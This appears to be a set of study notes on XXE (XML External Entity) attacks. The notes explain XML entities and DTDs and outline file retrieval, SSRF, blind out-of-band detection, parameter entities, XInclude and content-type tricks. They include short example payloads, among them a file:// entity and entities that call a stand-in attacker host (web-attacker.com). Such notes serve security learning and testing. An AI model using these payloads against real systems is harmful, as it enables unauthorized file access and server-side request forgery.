XXE - XML External Entity Attacks

Tools and Resources

How it works

Basics

  • XML - XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data. Earlier in the web's history, XML was in vogue as a data transport format (the "X" in "AJAX" stands for "XML"). But its popularity has now declined in favor of the JSON format.
  • XML Entities - XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities &lt; and &gt; represent the characters < and >. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.
  • DTD: Document Type Definition - The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD") or can be loaded from elsewhere (known as an "external DTD") or can be hybrid of the two.
  • XML Custom Entities - XML allows custom entities to be defined within the DTD. For example:
    <!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>
    This definition means that any usage of the entity reference &myentity; within the XML document will be replaced with the defined value: "my entity value".
  • XML External Entity - XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared.
    The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:
    <!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>
    The URL can use the file:// protocol, and so external entities can be loaded from file. For example:
    <!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>

Testing for XXE Vulnerabilities

  • Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response.
  • Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Burp Collaborator client is perfect for this purpose.
  • Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.

Attacks

XXE for retrieving files

  • You can retrieve an arbitrary file from a target filesystem by modifying a submitted XML in two ways:
    • Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file.
    • Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

XXE to perform SSRF

  • To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value. If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response, and so gain two-way interaction with the back-end system. If not, then you will only be able to perform blind SSRF attacks.

Blind XXE attacks

  • Many instances of XXE vulnerabilities are blind. This means that the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.
  • Attack surface for XXE injection vulnerabilities is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases, the attack surface is less visible. However, if you look in the right places, you will find XXE attack surface in requests that do not contain any XML.
  • You can often detect blind XXE using the same technique as for XXE SSRF attacks but triggering the out-of-band network interaction to a system that you control. For example, you would define an external entity as follows:
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]>

XML Parameter entities

  • Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used. In this situation, you might be able to use XML parameter entities instead. XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD. For present purposes, you only need to know two things. First, the declaration of an XML parameter entity includes the percent character before the entity name:
    <!ENTITY % myparameterentity "my parameter entity value" >
    And second, parameter entities are referenced using the percent character instead of the usual ampersand:
    %myparameterentity;
    This means that you can test for blind XXE using out-of-band detection via XML parameter entities as follows:
    <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>

Blind XXE for OOB Exfiltration

Blind XXE to retrieve data via error messages

Blind XXE via repurposing a local DTD

  • It might be possible to trigger error messages containing sensitive data, due to a loophole in the XML language specification. If a document's DTD uses a hybrid of internal and external DTD declarations, then the internal DTD can redefine entities that are declared in the external DTD. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed.
  • XInclude Attacks
    • Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. When you cannot submit this data via the DOCTYPE element, You can attempt to use the XInclude element, which allows XML documents to be built from sub-documents.
    • Placing your attack data in this element, allows your data to be placed in a server-side XML document
  • XXE via file upload
  • XXE via modified content type
    • Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.
    • If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use the XML format.